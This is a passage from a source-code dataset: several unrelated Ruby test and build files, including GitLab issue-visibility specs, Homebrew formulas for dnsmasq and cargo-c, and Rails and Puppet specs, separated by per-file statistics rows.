describe '#can_be_worked_on?' do
let(:project) { build(:project) }
subject { build(:issue, :opened, project: project) }
context 'is closed' do
subject { build(:issue, :closed) }
it { is_expected.not_to be_can_be_worked_on }
end
context 'project is forked' do
before do
allow(project).to receive(:forked?).and_return(true)
end
it { is_expected.not_to be_can_be_worked_on }
end
it { is_expected.to be_can_be_worked_on }
end
describe '#participants' do
context 'using a public project' do
let_it_be(:issue) { create(:issue, project: reusable_project) }
let!(:note1) do
create(:note_on_issue, noteable: issue, project: reusable_project, note: 'a')
end
let!(:note2) do
create(:note_on_issue, noteable: issue, project: reusable_project, note: 'b')
end
it 'includes the issue author' do
expect(issue.participants).to include(issue.author)
end
it 'includes the authors of the notes' do
expect(issue.participants).to include(note1.author, note2.author)
end
end
context 'using a private project' do
it 'does not include mentioned users that do not have access to the project' do
project = create(:project)
issue = create(:issue, project: project)
user = create(:user)
create(:note_on_issue,
noteable: issue,
project: project,
note: user.to_reference)
expect(issue.participants).not_to include(user)
end
end
end
describe 'cached counts' do
it 'updates when assignees change' do
user1 = create(:user)
user2 = create(:user)
issue = create(:issue, assignees: [user1], project: reusable_project)
reusable_project.add_developer(user1)
reusable_project.add_developer(user2)
expect(user1.assigned_open_issues_count).to eq(1)
expect(user2.assigned_open_issues_count).to eq(0)
issue.assignees = [user2]
issue.save!
expect(user1.assigned_open_issues_count).to eq(0)
expect(user2.assigned_open_issues_count).to eq(1)
end
end
describe '#visible_to_user?' do
let(:project) { reusable_project }
let(:issue) { build(:issue, project: project) }
subject { issue.visible_to_user?(user) }
context 'with a project' do
it 'returns false when feature is disabled' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::DISABLED)
is_expected.to eq(false)
end
it 'returns false when restricted for members' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::PRIVATE)
is_expected.to eq(false)
end
end
context 'without a user' do
let(:user) { nil }
before do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::PUBLIC)
end
it 'returns true when the issue is publicly visible' do
expect(issue).to receive(:publicly_visible?).and_return(true)
is_expected.to eq(true)
end
it 'returns false when the issue is not publicly visible' do
expect(issue).to receive(:publicly_visible?).and_return(false)
is_expected.to eq(false)
end
end
context 'with a user' do
shared_examples 'issue readable by user' do
it { is_expected.to eq(true) }
end
shared_examples 'issue not readable by user' do
it { is_expected.to eq(false) }
end
shared_examples 'confidential issue readable by user' do
specify do
issue.confidential = true
is_expected.to eq(true)
end
end
shared_examples 'confidential issue not readable by user' do
specify do
issue.confidential = true
is_expected.to eq(false)
end
end
context 'with an admin user' do
let(:user) { build(:admin) }
context 'when admin mode is enabled', :enable_admin_mode do
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'when admin mode is disabled' do
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
end
context 'with an owner' do
before do
project.add_maintainer(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'with a reporter user' do
before do
project.add_reporter(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'with a guest user' do
before do
project.add_guest(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
context 'when user is an assignee' do
before do
issue.update!(assignees: [user])
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
context 'when user is the author' do
before do
issue.update!(author: user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
end
context 'with a user that is not a member' do
context 'using a public project' do
let(:project) { build(:project, :public) }
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'using an internal project' do
let(:project) { build(:project, :internal) }
context 'using an internal user' do
before do
allow(user).to receive(:external?).and_return(false)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'using an external user' do
before do
allow(user).to receive(:external?).and_return(true)
end
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
end
context 'using an external user' do
before do
allow(user).to receive(:external?).and_return(true)
end
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
end
context 'with an external authentication service' do
before do
enable_external_authorization_service_check
end
it 'is `false` when an external authorization service is enabled' do
issue = build(:issue, project: build(:project, :public))
expect(issue).not_to be_visible_to_user
end
it 'checks the external service to determine if an issue is readable by a user' do
project = build(:project, :public,
external_authorization_classification_label: 'a-label')
issue = build(:issue, project: project)
user = build(:user)
expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false }
expect(issue.visible_to_user?(user)).to be_falsy
end
it 'does not check the external service if a user does not have access to the project' do
project = build(:project, :private,
external_authorization_classification_label: 'a-label')
issue = build(:issue, project: project)
user = build(:user)
expect(::Gitlab::ExternalAuthorization).not_to receive(:access_allowed?)
expect(issue.visible_to_user?(user)).to be_falsy
end
context 'with an admin' do
context 'when admin mode is enabled', :enable_admin_mode do
it 'does not check the external webservice' do
issue = build(:issue)
user = build(:admin)
expect(::Gitlab::ExternalAuthorization).not_to receive(:access_allowed?)
issue.visible_to_user?(user)
end
end
context 'when admin mode is disabled' do
it 'checks the external service to determine if an issue is readable by the admin' do
project = build(:project, :public,
external_authorization_classification_label: 'a-label')
issue = build(:issue, project: project)
user = build(:admin)
expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false }
expect(issue.visible_to_user?(user)).to be_falsy
end
end
end
end
context 'when issue is moved to a private project' do
let(:private_project) { build(:project, :private)}
before do
issue.update!(project: private_project) # move issue to private project
end
shared_examples 'issue visible if user has guest access' do
context 'when user is not a member' do
it_behaves_like 'issue not readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'when user is a guest' do
before do
private_project.add_guest(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
end
context 'when user is the author of the original issue' do
before do
issue.update!(author: user)
end
it_behaves_like 'issue visible if user has guest access'
end
context 'when user is an assignee in the original issue' do
before do
issue.update!(assignees: [user])
end
it_behaves_like 'issue visible if user has guest access'
end
context 'when user is not the author or an assignee in original issue' do
context 'when user is a guest' do
before do
private_project.add_guest(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue not readable by user'
end
context 'when user is a reporter' do
before do
private_project.add_reporter(user)
end
it_behaves_like 'issue readable by user'
it_behaves_like 'confidential issue readable by user'
end
end
end
end
end
describe '#publicly_visible?' do
context 'using a public project' do
let(:project) { create(:project, :public) }
it 'returns true for a regular issue' do
issue = build(:issue, project: project)
expect(issue).to be_truthy
end
it 'returns false for a confidential issue' do
issue = build(:issue, :confidential, project: project)
expect(issue).not_to be_falsy
end
end
context 'using an internal project' do
let(:project) { create(:project, :internal) }
it 'returns false for a regular issue' do
issue = build(:issue, project: project)
expect(issue).not_to be_falsy
end
it 'returns false for a confidential issue' do
issue = build(:issue, :confidential, project: project)
expect(issue).not_to be_falsy
end
end
context 'using a private project' do
let(:project) { create(:project, :private) }
it 'returns false for a regular issue' do
issue = build(:issue, project: project)
expect(issue).not_to be_falsy
end
it 'returns false for a confidential issue' do
issue = build(:issue, :confidential, project: project)
expect(issue).not_to be_falsy
end
end
end
describe '#hook_attrs' do
it 'delegates to Gitlab::HookData::IssueBuilder#build' do
builder = double
expect(Gitlab::HookData::IssueBuilder)
.to receive(:new).with(subject).and_return(builder)
expect(builder).to receive(:build)
subject.hook_attrs
end
end
describe '#check_for_spam?' do
using RSpec::Parameterized::TableSyntax
where(:visibility_level, :confidential, :new_attributes, :check_for_spam?) do
Gitlab::VisibilityLevel::PUBLIC | false | { description: 'woo' } | true
Gitlab::VisibilityLevel::PUBLIC | false | { title: 'woo' } | true
Gitlab::VisibilityLevel::PUBLIC | true | { confidential: false } | true
Gitlab::VisibilityLevel::PUBLIC | true | { description: 'woo' } | false
Gitlab::VisibilityLevel::PUBLIC | false | { title: 'woo', confidential: true } | false
Gitlab::VisibilityLevel::PUBLIC | false | { description: 'original description' } | false
Gitlab::VisibilityLevel::INTERNAL | false | { description: 'woo' } | false
Gitlab::VisibilityLevel::PRIVATE | false | { description: 'woo' } | false
end
with_them do
it 'checks for spam on issues that can be seen anonymously' do
project = reusable_project
project.update!(visibility_level: visibility_level)
issue = create(:issue, project: project, confidential: confidential, description: 'original description')
issue.assign_attributes(new_attributes)
expect(issue.check_for_spam?).to eq(check_for_spam?)
end
end
end
describe 'removing an issue' do
it 'refreshes the number of open issues of the project' do
project = subject.project
expect { subject.destroy! }
.to change { project.open_issues_count }.from(1).to(0)
end
end
describe '.public_only' do
it 'only returns public issues' do
public_issue = create(:issue, project: reusable_project)
create(:issue, project: reusable_project, confidential: true)
expect(described_class.public_only).to eq([public_issue])
end
end
describe '.confidential_only' do
it 'only returns confidential_only issues' do
create(:issue, project: reusable_project)
confidential_issue = create(:issue, project: reusable_project, confidential: true)
expect(described_class.confidential_only).to eq([confidential_issue])
end
end
describe '.by_project_id_and_iid' do
let_it_be(:issue_a) { create(:issue, project: reusable_project) }
let_it_be(:issue_b) { create(:issue, iid: issue_a.iid) }
let_it_be(:issue_c) { create(:issue, project: issue_a.project) }
let_it_be(:issue_d) { create(:issue, project: issue_a.project) }
it_behaves_like 'a where_composite scope', :by_project_id_and_iid do
let(:all_results) { [issue_a, issue_b, issue_c, issue_d] }
let(:first_result) { issue_a }
let(:composite_ids) do
all_results.map { |issue| { project_id: issue.project_id, iid: issue.iid } }
end
end
end
describe '.service_desk' do
it 'returns the service desk issue' do
service_desk_issue = create(:issue, project: reusable_project, author: ::User.support_bot)
regular_issue = create(:issue, project: reusable_project)
expect(described_class.service_desk).to include(service_desk_issue)
expect(described_class.service_desk).not_to include(regular_issue)
end
end
it_behaves_like 'throttled touch' do
subject { create(:issue, updated_at: 1.hour.ago) }
end
describe "#labels_hook_attrs" do
let(:label) { create(:label) }
let(:issue) { create(:labeled_issue, project: reusable_project, labels: [label]) }
it "returns a list of label hook attributes" do
expect(issue.labels_hook_attrs).to eq([label.hook_attrs])
end
end
context "relative positioning" do
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:issue1) { create(:issue, project: project, relative_position: nil) }
let_it_be(:issue2) { create(:issue, project: project, relative_position: nil) }
it_behaves_like "a class that supports relative positioning" do
let_it_be(:project) { reusable_project }
let(:factory) { :issue }
let(:default_params) { { project: project } }
end
it 'is not blocked for repositioning by default' do
expect(issue1.blocked_for_repositioning?).to eq(false)
end
context 'when block_issue_repositioning flag is enabled for group' do
before do
stub_feature_flags(block_issue_repositioning: group)
end
it 'is blocked for repositioning' do
expect(issue1.blocked_for_repositioning?).to eq(true)
end
it 'does not move issues with null position' do
payload = [issue1, issue2]
expect { described_class.move_nulls_to_end(payload) }.to raise_error(Gitlab::RelativePositioning::IssuePositioningDisabled)
expect { described_class.move_nulls_to_start(payload) }.to raise_error(Gitlab::RelativePositioning::IssuePositioningDisabled)
end
end
end
it_behaves_like 'versioned description'
describe "#previous_updated_at" do
let_it_be(:updated_at) { Time.zone.local(2012, 01, 06) }
let_it_be(:issue) { create(:issue, project: reusable_project, updated_at: updated_at) }
it 'returns updated_at value if updated_at did not change at all' do
allow(issue).to receive(:previous_changes).and_return({})
expect(issue.previous_updated_at).to eq(updated_at)
end
it 'returns updated_at value if `previous_changes` has nil value for `updated_at`' do
allow(issue).to receive(:previous_changes).and_return({ 'updated_at' => nil })
expect(issue.previous_updated_at).to eq(updated_at)
end
it 'returns updated_at value if previous updated_at value is not present' do
allow(issue).to receive(:previous_changes).and_return({ 'updated_at' => [nil, Time.zone.local(2013, 02, 06)] })
expect(issue.previous_updated_at).to eq(updated_at)
end
it 'returns previous updated_at when present' do
allow(issue).to receive(:previous_changes).and_return({ 'updated_at' => [Time.zone.local(2013, 02, 06), Time.zone.local(2013, 03, 06)] })
expect(issue.previous_updated_at).to eq(Time.zone.local(2013, 02, 06))
end
end
describe '#design_collection' do
it 'returns a design collection' do
issue = build(:issue)
collection = issue.design_collection
expect(collection).to be_a(DesignManagement::DesignCollection)
expect(collection.issue).to eq(issue)
end
end
describe 'current designs' do
let(:issue) { create(:issue, project: reusable_project) }
subject { issue.designs.current }
context 'an issue has no designs' do
it { is_expected.to be_empty }
end
context 'an issue only has current designs' do
let!(:design_a) { create(:design, :with_file, issue: issue) }
let!(:design_b) { create(:design, :with_file, issue: issue) }
let!(:design_c) { create(:design, :with_file, issue: issue) }
it { is_expected.to include(design_a, design_b, design_c) }
end
context 'an issue only has deleted designs' do
let!(:design_a) { create(:design, :with_file, issue: issue, deleted: true) }
let!(:design_b) { create(:design, :with_file, issue: issue, deleted: true) }
let!(:design_c) { create(:design, :with_file, issue: issue, deleted: true) }
it { is_expected.to be_empty }
end
context 'an issue has a mixture of current and deleted designs' do
let!(:design_a) { create(:design, :with_file, issue: issue) }
let!(:design_b) { create(:design, :with_file, issue: issue, deleted: true) }
let!(:design_c) { create(:design, :with_file, issue: issue) }
it { is_expected.to contain_exactly(design_a, design_c) }
end
end
describe '.with_label_attributes' do
subject { described_class.with_label_attributes(label_attributes) }
let(:label_attributes) { { title: 'hello world', description: 'hi' } }
it 'gets issues with given label attributes' do
label = create(:label, **label_attributes)
labeled_issue = create(:labeled_issue, project: label.project, labels: [label])
expect(subject).to include(labeled_issue)
end
it 'excludes issues without given label attributes' do
label = create(:label, title: 'GitLab', description: 'tanuki')
labeled_issue = create(:labeled_issue, project: label.project, labels: [label])
expect(subject).not_to include(labeled_issue)
end
end
describe 'banzai_render_context' do
let(:project) { build(:project_empty_repo) }
let(:issue) { build :issue, project: project }
subject(:context) { issue.banzai_render_context(:title) }
it 'sets the label_url_method in the context' do
expect(context[:label_url_method]).to eq(:project_issues_url)
end
end
describe 'scheduling rebalancing' do
before do
allow_next_instance_of(RelativePositioning::Mover) do |mover|
allow(mover).to receive(:move) { raise ActiveRecord::QueryCanceled }
end
end
shared_examples 'schedules issues rebalancing' do
let(:issue) { build_stubbed(:issue, relative_position: 100, project: project) }
it 'schedules rebalancing if we time-out when moving' do
lhs = build_stubbed(:issue, relative_position: 99, project: project)
to_move = build(:issue, project: project)
expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, project_id, namespace_id)
expect { to_move.move_between(lhs, issue) }.to raise_error(ActiveRecord::QueryCanceled)
end
end
context 'when project in user namespace' do
let(:project) { build_stubbed(:project_empty_repo) }
let(:project_id) { project.id }
let(:namespace_id) { nil }
it_behaves_like 'schedules issues rebalancing'
end
context 'when project in a group namespace' do
let(:group) { create(:group) }
let(:project) { build_stubbed(:project_empty_repo, group: group) }
let(:project_id) { nil }
let(:namespace_id) { group.id }
it_behaves_like 'schedules issues rebalancing'
end
end
describe '#allows_reviewers?' do
it 'returns false as we do not support reviewers on issues yet' do
issue = build_stubbed(:issue)
expect(issue.allows_reviewers?).to be(false)
end
end
describe '#issue_type_supports?' do
let_it_be(:issue) { create(:issue) }
it 'raises error when feature is invalid' do
expect { issue.issue_type_supports?(:unkown_feature) }.to raise_error(ArgumentError)
end
end
describe '#supports_time_tracking?' do
let_it_be(:project) { create(:project) }
let_it_be_with_refind(:issue) { create(:incident, project: project) }
where(:issue_type, :supports_time_tracking) do
:issue | true
:incident | true
end
with_them do
before do
issue.update!(issue_type: issue_type)
end
it do
expect(issue.supports_time_tracking?).to eq(supports_time_tracking)
end
end
end
describe '#email_participants_emails' do
let_it_be(:issue) { create(:issue) }
it 'returns a list of emails' do
participant1 = issue.issue_email_participants.create!(email: '[email protected]')
participant2 = issue.issue_email_participants.create!(email: '[email protected]')
expect(issue.email_participants_emails).to contain_exactly(participant1.email, participant2.email)
end
end
describe '#email_participants_downcase' do
it 'returns a list of emails with all uppercase letters replaced with their lowercase counterparts' do
participant = create(:issue_email_participant, email: '[email protected]')
expect(participant.issue.email_participants_emails_downcase).to match([participant.email.downcase])
end
end
end
| 33 | 202 | 0.664576 |
bb678b40adeca630c58427998f95547fd477c474 | 5,267 | # encoding: utf-8
require 'spec_helper'
describe 'Formtastic::FormBuilder#fields_for' do
include FormtasticSpecHelper
before do
@output_buffer = ''
mock_everything
@new_post.stub(:author).and_return(::Author.new)
end
context 'outside a form_for block' do
it 'yields an instance of FormHelper.builder' do
semantic_fields_for(@new_post) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
semantic_fields_for(@new_post.author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
semantic_fields_for(:author, @new_post.author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
semantic_fields_for(:author, @hash_backed_author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
end
it 'should respond to input' do
semantic_fields_for(@new_post) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
semantic_fields_for(@new_post.author) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
semantic_fields_for(:author, @new_post.author) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
semantic_fields_for(:author, @hash_backed_author) do |nested_builder|
nested_builder.respond_to?(:input).should be_true
end
end
end
context 'within a form_for block' do
it 'yields an instance of FormHelper.builder' do
semantic_form_for(@new_post) do |builder|
builder.semantic_fields_for(:author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
end
end
it 'yields an instance of FormHelper.builder with hash-like model' do
semantic_form_for(:user) do |builder|
builder.semantic_fields_for(:author, @hash_backed_author) do |nested_builder|
nested_builder.class.should == Formtastic::Helpers::FormHelper.builder
end
end
end
it 'nests the object name' do
semantic_form_for(@new_post) do |builder|
builder.semantic_fields_for(@bob) do |nested_builder|
nested_builder.object_name.should == 'post[author]'
end
end
end
it 'supports passing collection as second parameter' do
semantic_form_for(@new_post) do |builder|
builder.semantic_fields_for(:author, [@fred,@bob]) do |nested_builder|
nested_builder.object_name.should =~ /post\[author_attributes\]\[\d+\]/
end
end
end
it 'should sanitize html id for li tag' do
@bob.stub(:column_for_attribute).and_return(double('column', :type => :string, :limit => 255))
concat(semantic_form_for(@new_post) do |builder|
concat(builder.semantic_fields_for(@bob, :index => 1) do |nested_builder|
concat(nested_builder.inputs(:login))
end)
end)
output_buffer.should have_tag('form fieldset.inputs #post_author_1_login_input')
# Not valid selector, so using good ol' regex
output_buffer.should_not =~ /id="post\[author\]_1_login_input"/
# <=> output_buffer.should_not have_tag('form fieldset.inputs #post[author]_1_login_input')
end
it 'should use namespace provided in nested fields' do
@bob.stub(:column_for_attribute).and_return(double('column', :type => :string, :limit => 255))
concat(semantic_form_for(@new_post, :namespace => 'context2') do |builder|
concat(builder.semantic_fields_for(@bob, :index => 1) do |nested_builder|
concat(nested_builder.inputs(:login))
end)
end)
output_buffer.should have_tag('form fieldset.inputs #context2_post_author_1_login_input')
end
it 'should render errors on the nested inputs' do
@errors = double('errors')
@errors.stub(:[]).with(errors_matcher(:login)).and_return(['oh noes'])
@bob.stub(:errors).and_return(@errors)
concat(semantic_form_for(@new_post, :namespace => 'context2') do |builder|
concat(builder.semantic_fields_for(@bob) do |nested_builder|
concat(nested_builder.inputs(:login))
end)
end)
output_buffer.should =~ /oh noes/
end
end
context "when I rendered my own hidden id input" do
before do
output_buffer.replace ''
@fred.posts.size.should == 1
@fred.posts.first.stub(:persisted?).and_return(true)
@fred.stub(:posts_attributes=)
concat(semantic_form_for(@fred) do |builder|
concat(builder.semantic_fields_for(:posts) do |nested_builder|
concat(nested_builder.input(:id, :as => :hidden))
concat(nested_builder.input(:title))
end)
end)
end
it "should only render one hidden input (my one)" do
output_buffer.should have_tag 'input#author_posts_attributes_0_id', :count => 1
end
it "should render the hidden input inside an li.hidden" do
output_buffer.should have_tag 'li.hidden input#author_posts_attributes_0_id'
end
end
end
| 36.832168 | 100 | 0.677046 |
3327bcdbedf7ce6c43b06e40660247fddf8707db | 1,334 | require 'test_helper'
require 'simple_cqrs/events'
require 'uba/event_store/memory_store'
module Uba
module EventStore
class MemoryStoreTest < Minitest::Test
def test_save
store = MemoryStore.new
event = InventoryItemCreated.coerce! id: SecureRandom.uuid,
name: Faker::RickAndMorty.character
store.save_event(event)
end
def test_load_events_for_aggregate
store = MemoryStore.new
aggregate_id = SecureRandom.uuid
create_event = InventoryItemCreated.coerce! id: aggregate_id,
name: Faker::RickAndMorty.character
rename_event = InventoryItemRenamed.coerce! id: aggregate_id,
new_name: Faker::RickAndMorty.character
noise_event = InventoryItemCreated.coerce! id: SecureRandom.uuid,
name: Faker::RickAndMorty.character
store.save_event create_event
store.save_event noise_event
store.save_event rename_event
assert_equal([create_event, rename_event],
store.load_events_for_aggregate(aggregate_id),
'return only event with given aggregate_id')
end
end
end
end
| 35.105263 | 91 | 0.602699 |
013bb5429de9b6058d795d79094a65bca44db790 | 3,962 | class Dnsmasq < Formula
desc "Lightweight DNS forwarder and DHCP server"
homepage "http://www.thekelleys.org.uk/dnsmasq/doc.html"
url "http://www.thekelleys.org.uk/dnsmasq/dnsmasq-2.78.tar.gz"
sha256 "c92e5d78aa6353354d02aabf74590d08980bb1385d8a00b80ef9bc80430aa1dc"
bottle do
rebuild 1
sha256 "29b9a8f0b872785a893a2446098ea979a4172938aac84d4dcbc42e55ffb15e73" => :high_sierra
sha256 "8ec8cbc805daeeba93b450ec5c5fea02cdcc7978cf93a4e8032bb836c83c5f03" => :sierra
sha256 "84a562c8c0ff1a83cabfaa0bf50c9a05169715ce879c4308efbc132e66302120" => :el_capitan
sha256 "3d993c53ef42b234a8f9c6f51bc67bf263f7fcedf2ba4637ccc39d6115769d4e" => :x86_64_linux
end
option "with-libidn", "Compile with IDN support"
option "with-dnssec", "Compile with DNSSEC support"
deprecated_option "with-idn" => "with-libidn"
depends_on "pkg-config" => :build
depends_on "libidn" => :optional
depends_on "gettext" if build.with? "libidn"
depends_on "nettle" if build.with? "dnssec"
def install
ENV.deparallelize
# Fix etc location
inreplace %w[dnsmasq.conf.example src/config.h man/dnsmasq.8
man/es/dnsmasq.8 man/fr/dnsmasq.8].each do |s|
s.gsub! "/var/lib/misc/dnsmasq.leases",
var/"lib/misc/dnsmasq/dnsmasq.leases", false
s.gsub! "/etc/dnsmasq.conf", etc/"dnsmasq.conf", false
s.gsub! "/var/run/dnsmasq.pid", var/"run/dnsmasq/dnsmasq.pid", false
s.gsub! "/etc/dnsmasq.d", etc/"dnsmasq.d", false
s.gsub! "/etc/ppp/resolv.conf", etc/"dnsmasq.d/ppp/resolv.conf", false
s.gsub! "/etc/dhcpc/resolv.conf", etc/"dnsmasq.d/dhcpc/resolv.conf", false
s.gsub! "/usr/sbin/dnsmasq", HOMEBREW_PREFIX/"sbin/dnsmasq", false
end
# Optional IDN support
if build.with? "libidn"
inreplace "src/config.h", "/* #define HAVE_IDN */", "#define HAVE_IDN"
ENV.append_to_cflags "-I#{Formula["gettext"].opt_include}"
ENV.append "LDFLAGS", "-L#{Formula["gettext"].opt_lib} -lintl"
end
# Optional DNSSEC support
if build.with? "dnssec"
inreplace "src/config.h", "/* #define HAVE_DNSSEC */", "#define HAVE_DNSSEC"
inreplace "dnsmasq.conf.example" do |s|
s.gsub! "#conf-file=%%PREFIX%%/share/dnsmasq/trust-anchors.conf",
"conf-file=#{opt_pkgshare}/trust-anchors.conf"
s.gsub! "#dnssec", "dnssec"
end
end
# Fix compilation on Lion
ENV.append_to_cflags "-D__APPLE_USE_RFC_3542" if MacOS.version >= :lion
inreplace "Makefile" do |s|
s.change_make_var! "CFLAGS", ENV.cflags
s.change_make_var! "LDFLAGS", ENV.ldflags
end
if build.with? "libidn"
system "make", "install-i18n", "PREFIX=#{prefix}"
else
system "make", "install", "PREFIX=#{prefix}"
end
pkgshare.install "trust-anchors.conf" if build.with? "dnssec"
etc.install "dnsmasq.conf.example" => "dnsmasq.conf"
end
def post_install
(var/"lib/misc/dnsmasq").mkpath
(var/"run/dnsmasq").mkpath
(etc/"dnsmasq.d/ppp").mkpath
(etc/"dnsmasq.d/dhcpc").mkpath
end
def caveats; <<~EOS
To configure dnsmasq, take the default example configuration at
#{etc}/dnsmasq.conf and edit to taste.
EOS
end
plist_options :startup => true
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/dnsmasq</string>
<string>--keep-in-foreground</string>
<string>-C</string>
<string>#{etc}/dnsmasq.conf</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
EOS
end
test do
system "#{sbin}/dnsmasq", "--test"
end
end
| 33.863248 | 115 | 0.65371 |
1ad978d521fd17aeb35a65a492d5e7aa4013fe38 | 850 | # frozen_string_literal: true
Rails.application.routes.draw do
resources(:scheduled_tasks, concerns: active_scaffold) do
collection do
get :status
get :status_content
end
member do
get :log
put :run_now
end
end
get '/tasks_scheduler_daemon', to: 'tasks_scheduler_daemon#index', as: :tasks_scheduler_daemon
post '/tasks_scheduler_daemon/:tasks_scheduler_execute_action',
to: 'tasks_scheduler_daemon#execute', as: :execute_tasks_scheduler_daemon
get '/tasks_scheduler_daemon/status', to: 'tasks_scheduler_daemon#status',
as: :status_tasks_scheduler_daemon
get '/tasks_scheduler_daemon/download_log/:log_key', to: 'tasks_scheduler_daemon#download_log',
as: :download_log_tasks_scheduler_daemon
end
| 38.636364 | 97 | 0.684706 |
1886edf566fee8e1384f445c433e0a25757c515d | 248 | class AddInstallmentsFieldToSpreePayment < ActiveRecord::Migration
def change
add_column :spree_payments, :installments, :integer, default: 1
add_column :spree_payments, :interest, :decimal, precision: 10, scale: 4, default: 0.0
end
end | 41.333333 | 90 | 0.770161 |
21c3038458bb31a2fc9a2fa1ee962f4bd50853f3 | 1,155 | class CargoC < Formula
desc "Helper program to build and install c-like libraries"
homepage "https://github.com/lu-zero/cargo-c"
url "https://github.com/lu-zero/cargo-c/archive/v0.6.12.tar.gz"
sha256 "42f6c26039d24b0fa684c36417de6e43e7861e6acf3a3accf52de5548bf57ec3"
license "MIT"
bottle do
cellar :any
sha256 "af41919e5b362afb73c5cc3506ef08591cb1edd6a35832876d523208ddc9c51d" => :catalina
sha256 "6ee6f29f098bdf4baa7f168b8e599b28458bc0de7892770067d5c82e1bdfc84b" => :mojave
sha256 "efbca9b10f3978505b658bba9f23d2ce4f49479efa44d0e0fc3febf450e2987b" => :high_sierra
end
depends_on "rust" => :build
depends_on "libgit2"
depends_on "libssh2"
depends_on "[email protected]"
on_linux do
depends_on "pkg-config" => :build
end
def install
ENV["LIBGIT2_SYS_USE_PKG_CONFIG"] = "1"
ENV["LIBSSH2_SYS_USE_PKG_CONFIG"] = "1"
system "cargo", "install", *std_cargo_args
end
test do
cargo_error = "could not find `Cargo.toml`"
assert_match cargo_error, shell_output("#{bin}/cargo-cinstall cinstall 2>&1", 1)
assert_match cargo_error, shell_output("#{bin}/cargo-cbuild cbuild 2>&1", 1)
end
end
| 31.216216 | 93 | 0.743723 |
ff25cd8ae89e1a5fa880b48655987db16ad913b7 | 2,116 | require 'spec_helper'
describe 'couchbase_server', :type => :class do
let :params do
{
:version => '5.0.0'
}
end
context 'on an ubuntu system' do
let :facts do
{
:os => {
:family => 'Debian',
:name => 'Ubuntu',
:release => {
:full => '16.04'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise_5.0.0-ubuntu16.04_amd64.deb'
)
end
end
end
context 'on a debian system' do
let :facts do
{
:os => {
:family => 'Debian',
:name => 'Debian',
:release => {
:full => '7'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise_5.0.0-debian7_amd64.deb'
)
end
end
end
context 'on a centos system' do
let :facts do
{
:os => {
:family => 'RedHat',
:name => 'CentOS',
:release => {
:full => '7'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise-5.0.0-centos7.x86_64.rpm'
)
end
end
end
context 'on an opensuse system' do
let :facts do
{
:os => {
:family => 'RedHat',
:name => 'SuSE',
:release => {
:full => '12'
}
}
}
end
context 'couchbase_server::install' do
it 'contains a valid package name' do
is_expected.to contain_file('couchbase-server').with(
'path' => '/tmp/couchbase-server-enterprise-5.0.0-suse12.x86_64.rpm'
)
end
end
end
end
# vi: ts=2 et:
| 21.16 | 82 | 0.495747 |
bf92e13394211f1dd69433adbc78d24e0757e203 | 1,098 | require "spec_helper"
require "autotest/rails_rspec2"
describe Autotest::RailsRspec2 do
let(:rails_rspec2_autotest) { Autotest::RailsRspec2.new }
describe 'exceptions' do
let(:exceptions_regexp) { rails_rspec2_autotest.exceptions }
it "should match './log/test.log'" do
exceptions_regexp.should match('./log/test.log')
end
it "should match 'log/test.log'" do
exceptions_regexp.should match('log/test.log')
end
it "should not match './spec/models/user_spec.rb'" do
exceptions_regexp.should_not match('./spec/models/user_spec.rb')
end
it "should not match 'spec/models/user_spec.rb'" do
exceptions_regexp.should_not match('spec/models/user_spec.rb')
end
end
describe 'mappings' do
before do
rails_rspec2_autotest.find_order = %w(
spec/models/user_spec.rb
spec/support/blueprints.rb
)
end
it 'runs model specs when support files change' do
rails_rspec2_autotest.test_files_for('spec/support/blueprints.rb').should(
include('spec/models/user_spec.rb'))
end
end
end
| 26.142857 | 80 | 0.693989 |
